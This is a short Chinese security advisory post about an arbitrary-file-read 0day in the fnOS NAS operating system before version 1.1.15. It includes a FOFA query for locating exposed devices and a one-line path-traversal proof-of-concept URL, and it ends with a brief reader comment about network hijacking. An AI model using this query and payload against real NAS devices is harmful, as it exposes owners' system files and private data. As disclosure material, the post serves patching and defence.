免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞介绍
飞牛私有云fnOS是一款基于Debian Linux内核深度开发的国产、正版免费NAS操作系统。它专为家庭和个人用户设计,提供影视库(飞牛影视)、相册、文件管理、网盘挂载等功能,支持将闲置电脑、旧笔记本或Mini主机转化为安全、高效率的私有云存储。飞牛私有云fnOS出现严重0day漏洞,可以访问nas上任意文件(包括系统配置文件,用户存储文件)。
目前已知1.1.15版本已经修复该漏洞,漏洞影响范围未知(1.1.15版本以下均可能受到影响),互联网部署数量较多,请及时排查!
fofa
app="飞牛-私有云fnOS"
POC:
/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../
另一个可能的rce
|
最近发现莫名断网,我还以为是路由器问题,重装了问题依旧,高强度冲浪发现飞牛0day漏洞,全网都被劫持了 |
没有回复内容